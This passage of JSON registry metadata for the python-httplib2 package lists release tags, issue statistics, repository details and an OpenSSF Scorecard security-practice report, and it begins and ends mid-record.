repositories/httplib2%2Fhttplib2/tags/v0.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.3/manifests"},{"name":"v0.12.1","sha":"ead7f8038f1cd02a923544c4f3294c1389ad3e03","kind":"commit","published_at":"2019-02-14T16:38:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1/manifests"},{"name":"v0.12.0","sha":"86c3b4ea8614cbbddd86fc556781f2f79cd7c2ac","kind":"commit","published_at":"2018-11-14T04:40:05.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.0/manifests"},{"name":"v0.11.3","sha":"70fb0c820d2e8211992b402d34444e4b32a1cb6e","kind":"commit","published_at":"2018-03-30T02:21:39.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3/manifests"},{"name":"v0.11.2","sha":"470bb2a9db658b7f851522051f2b0201a21e8925","kind":"commit","published_at":"2018-03-30T02:09:45.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.2/manifests"},{"name":"v0.11.1","sha":"f20cd36c44b75d9206f050304937d5f4d63f5b7a","kind":"commit","published_at":"2018-03-26T17:15:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.1/manifests"},{"name":"v0.11.0","sha":"5dee729d87cecab1b6c0d7874a8bbd8d24452849","kind":"commit","published_at":"2018-03-21T18:13:04.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0/manifests"},{"name":"v0.10.3","sha":"1ae16e0e8e868e4b81225631ee37c6555493014b","kind":"commit","published_at":"2017-02-06T17:56:20.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3/manifests"},{"name":"v0.10.2","sha":"ef81f9566ee765b8f3d93429e3dfa17341d098e7","kind":"commit","published_at":"2017-02-03T21:09:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2/manifests"},{"name":"v0.10.1","sha":"4623377a073e1027a691fe139ba1e851eabf0d49","kind":"commit","published_at":"2017-02-03T19:43:17.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1/manifests"},{"name":"0.9.2","sha":"cf631a73e2f3f43897b65206127ced82382d35f5","kind":"tag","published_at":"2015-09-28T13:53:22.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2/manifests"},{"name":"0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"tag","published_at":"2015-09-28T13:52:59.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1/manifests"},{"name":"v0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"commit","published_at":"2015-04-11T13:50:15.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1/manifests"},{"name":"v0.9","sha":"058a1f9448d5c27c23772796f83a596caf9188e6","kind":"commit","published_at":"2014-04-15T12:53:06.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9/manifests"},{"name":"0.9","sha":"0197ec868a4fc638c08358b94200ffd6ddb1bf50","kind":"tag","published_at":"2014-04-14T12:50:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9/manifests"}]},"repo_metadata_updated_at":"2026-08-22T13:24:45.884Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:deb/debian/python-httplib2?arch=source\u0026distro=debian-12","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/debian/python-httplib2","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/debian/python-httplib2","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/debian/python-httplib2/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-21T12:09:40.812Z","issues_count":64,"pull_requests_count":61,"avg_time_to_close_issue":13710979.942857143,"avg_time_to_close_pull_request":12412190.204545455,"issues_closed_count":35,"pull_requests_closed_count":44,"pull_request_authors_count":42,"issue_authors_count":59,"avg_comments_per_issue":3.796875,"avg_comments_per_pull_request":2.4098360655737703,"merged_pull_requests_count":31,"bot_issues_count":0,"bot_pull_requests_count":4,"past_year_issues_count":5,"past_year_pull_requests_count":5,"past_year_avg_time_to_close_issue":520238.0,"past_year_avg_time_to_close_pull_request":596027.3333333334,"past_year_issues_closed_count":3,"past_year_pull_requests_closed_count":3,"past_year_pull_request_authors_count":5,"past_year_issue_authors_count":5,"past_year_avg_comments_per_issue":2.4,"past_year_avg_comments_per_pull_request":0.8,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":1,"past_year_merged_pull_requests_count":3,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/issues","maintainers":[{"login":"temoto","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}],"active_maintainers":[{"login":"temoto","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/debian-12/packages/python-httplib2/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/debian-12/packages/python-httplib2/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/debian-12/packages/python-httplib2/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/debian-12/packages/python-httplib2/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/debian-12/packages/python-httplib2/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/debian-12/packages/python-httplib2/codemeta","maintainers":[],"registry":{"name":"debian-12","url":"https://packages.debian.org/bookworm","ecosystem":"debian","default":true,"packages_count":34734,"maintainers_count":0,"namespaces_count":4,"keywords_count":2645,"github":"debian","metadata":{"codename":"bookworm","funded_packages_count":1237},"icon_url":"https://github.com/debian.png","created_at":"2026-02-04T11:01:49.459Z","updated_at":"2026-08-25T05:06:43.662Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/debian-12/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/debian-12/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/debian-12/namespaces"}},{"id":13432535,"name":"python-httplib2","ecosystem":"ubuntu","description":null,"homepage":"https://github.com/httplib2/httplib2","licenses":"other","normalized_licenses":[],"repository_url":"https://github.com/httplib2/httplib2","keywords_array":["libs"],"namespace":"main","versions_count":1,"first_release_published_at":"2026-02-07T20:07:06.416Z","latest_release_published_at":"2026-02-07T20:07:06.416Z","latest_release_number":"0.14.0-1ubuntu1","last_synced_at":"2026-03-08T06:33:57.959Z","created_at":"2026-02-07T20:07:05.941Z","updated_at":"2026-08-23T11:24:15.120Z","registry_url":"https://launchpad.net/ubuntu/+source/python-httplib2","install_command":"apt-get install python-httplib2","documentation_url":null,"metadata":{"component":"main","architecture":"all","priority":"optional","binary":"python-httplib2, python3-httplib2","standards_version":"4.4.1","maintainer":"Ubuntu Developers \u003cubuntu-devel-discuss@lists.ubuntu.com\u003e","build_depends":"debhelper-compat (= 12), dh-python, python-all, python-setuptools, python3-all, python3-setuptools","build_depends_indep":null,"build_depends_arch":null},"repo_metadata":{"id":5379896,"uuid":"53002916","full_name":"httplib2/httplib2","owner":"httplib2","description":"Small, fast HTTP client library for Python. Features persistent connections, cache, and Google App Engine support. Originally written by Joe Gregorio, now supported by community.","archived":false,"fork":false,"pushed_at":"2026-06-26T10:10:15.000Z","size":3934,"stargazers_count":512,"open_issues_count":63,"forks_count":189,"subscribers_count":22,"default_branch":"master","last_synced_at":"2026-08-21T12:21:59.455Z","etag":null,"topics":["http","http-client","network","python"],"latest_commit_sha":null,"homepage":"http://httplib2.readthedocs.io/","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"other","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/httplib2.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG","contributing":"contributing.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2016-03-02T22:59:52.000Z","updated_at":"2026-08-19T07:11:22.000Z","dependencies_parsed_at":"2024-06-18T12:23:46.605Z","dependency_job_id":"dbfee945-96d9-41e9-8932-65c2aca77af6","html_url":"https://github.com/httplib2/httplib2","commit_stats":{"total_commits":538,"total_committers":73,"mean_commits":7.36986301369863,"dds":0.6561338289962826,"last_synced_commit":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7"},"previous_names":[],"tags_count":43,"template":false,"template_full_name":null,"purl":"pkg:github/httplib2/httplib2","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/sbom","scorecard":{"id":471277,"data":{"date":"2025-08-11","repo":{"name":"github.com/httplib2/httplib2","commit":"1a6ff781792099e9e14d7beb610bd99112b17b07"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.4,"checks":[{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Code-Review","score":3,"reason":"Found 10/27 approved changesets -- score normalized to 3","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Maintained","score":1,"reason":"2 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 1","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/publish.yaml:1","Warn: no topLevel permission defined: .github/workflows/style.yaml:1","Warn: no topLevel permission defined: .github/workflows/test.yaml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:45: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:69: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:75: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:99: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:107: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:113: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:58: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: pipCommand not pinned by hash: script/test:28","Warn: pipCommand not pinned by hash: script/test:36","Warn: pipCommand not pinned by hash: script/test:42","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:112","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:35","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:74","Warn: pipCommand not pinned by hash: .github/workflows/style.yaml:26","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:42","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:44","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:69","Info:   0 out of  16 GitHub-owned GitHubAction dependencies pinned","Info:   1 out of  11 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Fuzzing","score":10,"reason":"project is fuzzed","details":["Info: OSSFuzz integration found","Info: PythonAtherisFuzzer integration found: tests/fuzz_request.py:2","Info: PythonAtherisFuzzer integration found: tests/fuzz_url.py:2"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":9,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Warn: project license file does not contain an FSF or OSI license."],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-79v4-65xg-pq4g"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 16 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-19T13:56:43.862Z","repository_id":5379896,"created_at":"2025-08-19T13:56:43.862Z","updated_at":"2025-08-19T13:56:43.862Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36802710,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-21T02:00:06.756Z","response_time":57,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"httplib2","name":"httplib2","uuid":"17128733","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/17128733?v=4","repositories_count":1,"last_synced_at":"2024-03-25T18:41:02.027Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/httplib2","funding_links":[],"total_stars":482,"followers":7,"following":0,"created_at":"2022-11-02T16:22:04.713Z","updated_at":"2024-03-25T18:41:02.043Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2/repositories"},"tags":[{"name":"v0.32.0","sha":"ba9bf505cd899f522f2bb58ca608444adf49afc1","kind":"commit","published_at":"2026-06-26T10:07:36.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.32.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.32.0/manifests"},{"name":"v0.31.2","sha":"a99a11fba8d5fa3bb9c47827e5cbfd641dfb88d3","kind":"commit","published_at":"2026-01-23T10:59:34.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.2/manifests"},{"name":"v0.31.1","sha":"6d2ea322d53a03d058cd8e63c12871cdd1127ca9","kind":"commit","published_at":"2026-01-13T12:08:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.1/manifests"},{"name":"v0.31.0","sha":"26cfea5d07a5817cf214d9978c856c91abf4e078","kind":"commit","published_at":"2025-09-11T12:04:48.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.0/manifests"},{"name":"v0.30.2","sha":"d9278ceafb7a05be9998a7a4b1cb7d6d3f689ee5","kind":"commit","published_at":"2025-09-10T17:35:30.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.2/manifests"},{"name":"v0.30.1","sha":"6cfe2e6b5aff994f07fa0dcddfacf6d3a7999b1b","kind":"commit","published_at":"2025-09-10T16:57:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg